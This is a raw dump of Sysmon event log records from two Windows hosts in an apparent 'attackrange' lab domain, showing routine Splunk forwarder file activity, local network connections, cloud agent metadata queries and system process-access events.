07:51:41.020{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE7378DF639E120A27DD485653656992,SHA256=053596724DBBEEA962DEFCFEB4027CED6454362A9029F91AFEA4DC9CC0982BEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103708Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:41.132{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=996A8AE60A71F849DD5F630BC521E23C,SHA256=18781B50E7064B7F2F0BF2AD4E92CE7068486D7A7239C45DE6D8BBAD7184F404,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081608Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:42.160{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35BE392F51ADD636E87570F5B0EEA8A7,SHA256=7AE785345EC31628304ED93D6E113BC808FC7D82B90893621189E80228BA2AA4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103710Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:41.367{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49537-false10.0.1.12-8000- 23542300x8000000000000000103709Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:42.163{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4FA5D8110719601F44368ABCE2F60B5,SHA256=8B611D1CFF70DF3DC18295475C7632AEACA9D7574A9FFB4FFC67233794D19F70,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081607Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:39.682{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50040-false10.0.1.12-8000- 23542300x800000000000000081609Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:43.160{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C447D3E30A9E829B8FB9D399B12F3518,SHA256=6912F69320AA2B4748939B944AFA5D975F77CF7B4D6F623284C5F3923C1092E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103711Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:43.163{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD672B5982A08ADA47A472940C8B7D87,SHA256=7D453D4F4251D26CD1BA0D4206446EA39A9A1720B4BA67AD2574BBA3E4270386,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081610Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:44.160{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DB64CF63D3DCD027E6879DBF5906DCD,SHA256=C4B6734F31A43B46135FDD1F06420A6A9E39958019A50DBC2BD918E2EF179CC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103712Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:44.163{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1F8B3D09DCBFEB574484F18BB706B6A,SHA256=260B8D215B1EDF65630197B0BDA29ABADF2AB1ABEC4BC63426137A9E6AD1F8AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081611Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:45.161{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49C43A2AB360D3CB4CED5A351C7876DF,SHA256=CEAD9E2A2B9900316C019E98F730DB026935D26DB789D6B8135BE6E92C454830,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103713Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:45.163{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25E9892EE3F9AA0A85284B4CE9268E67,SHA256=D5021F7720A8CA5DD062051487535138680CEBECC90CA2AB678D66E836DD101D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081612Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:46.161{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=731DAA5B422AA75454EA78410752C9DF,SHA256=5CBED4114FFA7E0053755CA146899D3BB93C85CC23EBCECFDAE53167882B5A8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103714Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:46.179{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5B5DE48D1D77D1E1C737B21E169B3F7,SHA256=0BE513487953D8291EAC33EFD3A5394497D66BF6E3A58957463FEF87F71EC695,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081613Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:47.161{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F044573C46C70556EBF9978CDD6186F6,SHA256=7763AD6F2872E1D98A2AFDDC59B0400AFE80CC280C89B9C85A5B231C5318BC72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103715Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:47.183{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA881CCAE69181B83CD2E3C6C2108A34,SHA256=3243EF023B98FD337625A7BB26B0A1DE1B95ED5E753865465C6B53A9F16A4C56,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081615Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:45.651{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50041-false10.0.1.12-8000- 23542300x800000000000000081614Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:48.161{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24BA505BD6A789C31F60672A9237D6A1,SHA256=D54D571186D516D801D418C85C9911E28C322C2FEF42EFF5FC1D99D07FFE0BC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103716Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:48.192{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E05D16B579536195F326B855011E000,SHA256=A7CD9CEC63BC554C4BB2077423139A5C53D66D53B40BF97671BD455C965312D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081616Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:49.286{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48F52BA1E2B7F51FF262C9F6AF2ABD69,SHA256=1657D8CB4B8BCC045315D050AF72705DA8AF5A3515583136A8F11B4862043FFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103722Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:49.192{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B227BA749D46702B17E10B348A367CD,SHA256=D25960C091A2C81A6D39FA192EE1989A609D9139E39FCF0A941D93A6B347CC45,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103721Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:47.503{58E9C193-ACB6-615A-4300-00000000FC01}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49542-false169.254.169.254-80http 354300x8000000000000000103720Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:47.439{58E9C193-ACB6-615A-4300-00000000FC01}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49541-false169.254.169.254-80http 354300x8000000000000000103719Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:47.385{58E9C193-ACB6-615A-4300-00000000FC01}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49540-false169.254.169.254-80http 354300x8000000000000000103718Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:47.384{58E9C193-ACB6-615A-4300-00000000FC01}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49539-false169.254.169.254-80http 354300x8000000000000000103717Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:47.322{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49538-false10.0.1.12-8000- 23542300x800000000000000081617Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:50.286{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2EAA2013FC90251EAEE1C2F66F2E891,SHA256=D965DB7EA2C3E0557B56415025406FB5D95105CEBC4FA32E102D09A6BEB77B63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103723Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:50.223{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E1B6413AC7A86B894494EE764013B27,SHA256=C6F8490600CDCFA4655ABEDC13A50781A539560BA4A303D8A7BA6655AC6E338C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081618Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:51.286{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E1C420F6DBA8A1E5314CC7BFD8B2213,SHA256=B365E4B45F8AFCD58C4593F6CE6CCA024A96F24351B6927729C21763D012CB71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103724Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:51.457{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E18A786CEBDC551479F4D08883DD772,SHA256=712FC459E349B3FC350AE7E6BD3DA370E0CC2B5528E577C6F5175AD5EE0C8CD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103726Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:52.473{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCC97F6668919D34E3D76F4DD4C437F8,SHA256=B5B6ADF3731B0E6B636398A913CE5E971E4D4CBB40D0298111CE8EA43B298101,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081620Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:52.286{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B530F475ABA2FD9714B67C779727103A,SHA256=A0163739D9EA338E08AFFD48E4C25415C65E1BCF4D6DBAD3408E21A4E6169736,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081619Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:52.082{2FDD8D40-AC99-615A-0D00-00000000FD01}7882532C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1600-00000000FD01}1192C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x8000000000000000103725Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:51:52.082{58E9C193-ACA7-615A-1400-00000000FC01}940C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f4-0xb1897dff) 23542300x8000000000000000103727Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:53.473{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C17BE7490138D93153AD0F0317EE3B0,SHA256=DAB39287E661BBBC154057FB64007BF4A9D8FD35FBD248DF6ADC20FFEB76D265,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081622Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:51.588{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50042-false10.0.1.12-8000- 23542300x800000000000000081621Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:53.286{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=052E10FCB78E75ECDFDC6EE41E2D56DF,SHA256=CD5763A23C9C852402A9F5D1CB6F97A9E3D27FB1049591F5361557A4ACD15345,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081623Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:54.286{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=733ED40F38528DB70CC5FCF141F7792C,SHA256=BC965C7C7596513410ED13BE12EA01C49AAD037E58540734A574A21ED5B15142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103729Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:54.473{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=241CA7BB20A22E2D4256AA7042941EB8,SHA256=5B618D7A2D4C52612E2A164D16BFA2AC0947B0024C22EBFA50066D17930E2A72,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103728Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:52.458{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49543-false10.0.1.12-8000- 23542300x800000000000000081624Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:55.286{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=973CAAC2350ABD72E22728E8E8BA3F59,SHA256=54E32E8214D315F4595D9F32653C451D271329DE38539E643084DCB94E8084CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103730Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:55.473{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C56A73C3BCCD644C8039690BB249B0C,SHA256=C100EDFBA46C496D1C58BFF2564F1D8FFCC7F2DE26F9C8D4FA3EC5C22F2EBBE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103732Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:56.854{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103731Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:56.479{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D376045A8C92F9E596BE098446E416EC,SHA256=ADA314B6DF1AA701174A8A5FAEEC7171D383982AF5CF07D0027DD621C4953554,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081626Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:56.289{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94577C794B81A1A7D6DB0131C961D409,SHA256=6E8B7CA700129982DA84CA06215C53C88712666C1F5EE52186733BC01A7FCA66,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000081625Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:51:56.211{2FDD8D40-AC9A-615A-1000-00000000FD01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f4-0xb3ff7896) 23542300x8000000000000000103733Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:57.479{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CEC123F5F4CEB87011BE3936C381467,SHA256=F699428ED1EBC8E5CCB4CD42BC3A07D64E2F3B9E4F826BE39A52F67364566074,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081627Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:57.289{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81329217DA2BEBB2C663C2CA26BD0031,SHA256=F3A17EB395F59B8C56E2565ED6A64F46A23CC50FE77E96FED2E19954F46A0D64,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103742Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:58.667{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B29E-615A-D401-00000000FC01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103741Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:58.667{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103740Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:58.667{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103739Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 